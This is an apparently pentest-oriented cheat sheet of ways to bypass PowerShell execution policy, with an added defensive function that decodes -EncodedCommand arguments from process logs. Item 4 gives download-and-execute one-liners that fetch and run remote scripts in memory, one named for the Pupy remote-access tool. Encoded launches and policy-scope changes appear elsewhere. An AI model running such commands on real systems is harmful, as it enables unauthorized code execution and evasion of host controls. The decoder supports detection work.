BYPASSING POWERSHELL EXECUTION POLICY

POLICY STATUS

PS C:\> Get-ExecutionPolicy          (returns the effective policy, e.g. Restricted or Bypass)

POLICY SCOPE 

Get-ExecutionPolicy -List | Format-Table -AutoSize

BYPASS POLICY 

1. COPY & PASTE

PS> write-host "string to execute"

CMD> Powershell -command "Write-Host 'My voice is my passport, verify me.'"
CMD> Powershell -c "Write-Host 'My voice is my passport, verify me.'"

2. ECHO SCRIPT

CMD> Echo Write-Host "powershell script" | PowerShell.exe -noprofile -

3. FROM FILE, PIPED TO STANDARD INPUT

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -
or
TYPE .\runme.ps1 | PowerShell.exe -noprofile -

4. ONE-LINER

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.43.221/pupy.ps1')"

5. ENCODED

$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

AFTER ENCODING

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
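Because -EncodedCommand is just Base64 over UTF-16LE, the encoding above is trivially reversible. The following is an added defensive example (not from the original post or the NetSPI reference) that pulls the encoded argument out of a captured process command line, such as the CommandLine field of a process-creation event, and decodes it back to plaintext; the sample command lines are constructed, and the first one reuses the encoded string shown above.

```powershell
# Added example (not from the original post): decode the -EncodedCommand argument
# out of a captured process command line so a reviewer can see the plaintext.
function Get-DecodedPowerShellCommand {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    # Exclude -ex*/-ep* so "-ExecutionPolicy Unrestricted" (a valid Base64 charset!) is not matched.
    $pattern = '(?i)(?:^|\s)-e(?![xp])[a-z]*\s+(["'']?)([A-Za-z0-9+/=]{8,})\1'
    $m = [regex]::Match($CommandLine, $pattern)
    if (-not $m.Success) { return $null }

    try {
        $bytes = [Convert]::FromBase64String($m.Groups[2].Value)
    } catch {
        return $null     # switch matched, but the argument is not valid Base64
    }

    # -EncodedCommand is always UTF-16LE, the "Unicode" encoding used when it was built
    $decoded = [System.Text.Encoding]::Unicode.GetString($bytes)

    # An odd byte count or embedded NULs means this was not UTF-16LE text; do not trust it
    if (($bytes.Length % 2) -ne 0 -or $decoded.IndexOf([char]0) -ge 0) { return $null }
    return $decoded
}

# Constructed sample command lines, as they might appear in a process-creation log
$samples = @(
    'powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA',
    'powershell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1',
    'powershell.exe -nop -w hidden -e ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-ExecutionPolicy -List'))
)

foreach ($cmd in $samples) {
    $plain = Get-DecodedPowerShellCommand -CommandLine $cmd
    if ($plain) { "DECODED            : $plain" } else { "NO ENCODED COMMAND : $cmd" }
}
```

Run it against the CommandLine field of your own process-creation telemetry (for example Sysmon Event ID 1 or Security Event ID 4688) to surface what an encoded launch actually executes.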

6. INVOKE COMMAND

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

7. INVOKE EXPRESSION

Get-Content .\runme.ps1 | Invoke-Expression
or
GC .\runme.ps1 | iex

RESTRICT / BYPASS EXECUTION POLICY

RUN WITHOUT CONFIG CHANGE
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

FOR UNSIGNED SCRIPTS

PowerShell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1

SIGN IT (see http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html)
THEN USE
PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

STATUS OF A SINGLE SCOPE

Get-ExecutionPolicy -Scope Process

FOR PROCESS (SESSION)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

FOR USER, PERSISTENT VIA REG KEY
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted

MODIFYING REG KEY (PERSISTENT; the ExecutionPolicy value under this key)
HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell


REF : https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
